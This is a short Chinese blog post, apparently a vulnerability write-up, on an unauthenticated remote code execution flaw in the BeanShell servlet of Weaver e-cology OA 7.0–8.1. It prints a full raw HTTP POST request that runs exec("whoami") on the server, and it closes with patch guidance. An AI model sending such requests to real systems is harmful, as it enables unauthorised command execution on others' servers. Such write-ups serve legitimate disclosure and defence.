泛微OA远程代码执行漏洞利用

0x00 前言

泛微OA远程代码执行漏洞,泛微e-cology OA系统的JAVA Beanshell接口可被未授权访问,攻击者调用该Beanshell接口,可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行。

影响版本:7.0 8.0 8.1

0x01 漏洞利用

通过访问泛微协同办公系统weaver/bsh.servlet.BshServlet,可直接访问Beanshell接口执行任意命令,postbsh.script=exec("whoami");即可执行命令。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST /weaver/bsh.servlet.BshServlet HTTP/1.1
Host: zhengbao.wang
Content-Length: 104
Cache-Control: max-age=0
Origin: https://zhengbao.wang
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://zhengbao/weaver/bsh.servlet.BshServlet
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: testBanCookie=test; JSESSIONID=abcNcyM2yAMSeaWQ-nS1w
Connection: close

bsh.script=exec%28%22whoami%22%29%3B%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A

0x02 修复方式

升级到泛微OA最新版本或安装官方BSH补丁包https://www.weaver.com.cn/cs/securityDownload.asp

本文标题:泛微OA远程代码执行漏洞利用

文章作者:boogle

发布时间:2019年09月26日 - 14:30

最后更新:2019年10月05日 - 11:02

原始链接:http://zhengbao.wang/泛微OA远程代码执行漏洞利用/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

感觉写的不错,给买个棒棒糖呗